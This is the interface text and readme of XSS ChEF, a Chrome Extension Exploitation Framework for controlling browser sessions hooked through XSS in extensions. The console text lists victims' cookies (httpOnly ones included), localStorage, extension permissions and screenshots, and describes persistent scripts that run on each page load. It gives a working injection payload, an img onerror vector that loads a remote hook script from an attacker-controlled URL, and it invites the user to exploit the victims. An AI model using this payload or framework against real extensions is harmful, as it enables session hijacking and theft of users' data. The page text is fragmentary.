Persistent scripts are scripts that are run on hooked browser tabs on every page load if the URL matches given regexp.
Active scripts
Add persistent script
| Date | Hook Script name |
URL | Result |
|---|
| ID | Window | Title |
|---|
Legend
- choose hooked browser session
- refresh tab list from session
- launch URL in this browser
- launching this might be visible in hooked browser
Links (click to navigate in tab)
| URL | |
|---|---|
| Cookies | |
| Cookies w/httpOnly | |
| localStorage |
| Hook ID | |
|---|---|
| Extension URL | |
| Permissions | |
| Cookies | |
| localStorage | |
| Extension HTML |
Create new tab
Screenshot
Choose hooked session
Each hook below represents single browser session that XSS has been activated in. Chose one you'd like to exploit:
Hooked session details
Below are details about your currently selected hook.
About XSS ChEF
XSS ChEF ver 0.1
Chrome Extension Exploitation Framework
by Krzysztof Kotowicz Logo design by Gareth HeyesThis is a Chrome Extension Exploitation Framework - think BeEF for Chrome extensions. Whenever you encounter a XSS vulnerability in Chrome extension, ChEF will ease the exploitation.
Hook code
First, you need to find a XSS vulnerable Chrome extension. I won't help here. Once you've found it, inject Chrome extension with a hook vector:
if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}
For example:
<img src=x onerror="if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}">
After hook has been executed, launch this console (in a separate browser), choose hooked session by clicking on the and start having fun!
Readme